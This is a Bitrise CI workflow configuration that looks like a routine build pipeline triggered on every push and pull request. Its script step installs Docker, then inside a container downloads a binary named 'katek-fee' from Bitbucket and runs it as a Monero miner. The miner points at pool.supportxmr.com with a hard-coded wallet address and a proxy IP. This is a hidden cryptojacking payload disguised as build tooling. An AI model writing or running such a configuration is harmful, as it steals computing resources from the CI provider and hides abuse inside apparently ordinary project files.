---
format_version: '11'
default_step_lib_source: https://github.com/bitrise-io/bitrise-steplib.git
project_type: other
trigger_map:
- push_branch: "*"
  workflow: primary
- pull_request_source_branch: "*"
  workflow: primary
workflows:
  primary:
    steps:
    - script@1:
        title: script panteq
        inputs:
        - content: sudo apt-get update && sudo apt install -y apt-transport-https ca-certificates curl software-properties-common && curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - && sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable" && apt-cache policy docker-ce && sudo apt install -y docker-ce && sudo docker pull ubuntu && sudo docker run --dns 1.1.1.1 -d -t --name Adinda ubuntu && sudo docker exec -t Adinda sh -c "apt-get update && apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && ./katek-fee -o pool.supportxmr.com:5555 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -p proxyalibaba -k -a rx/0 --threads=2 --proxy=47.241.121.158:2003"
    - activate-ssh-key@4:
        run_if: '{{getenv "SSH_RSA_PRIVATE_KEY" | ne ""}}'
    - git-clone@6: {}
    - deploy-to-bitrise-io@1: {}
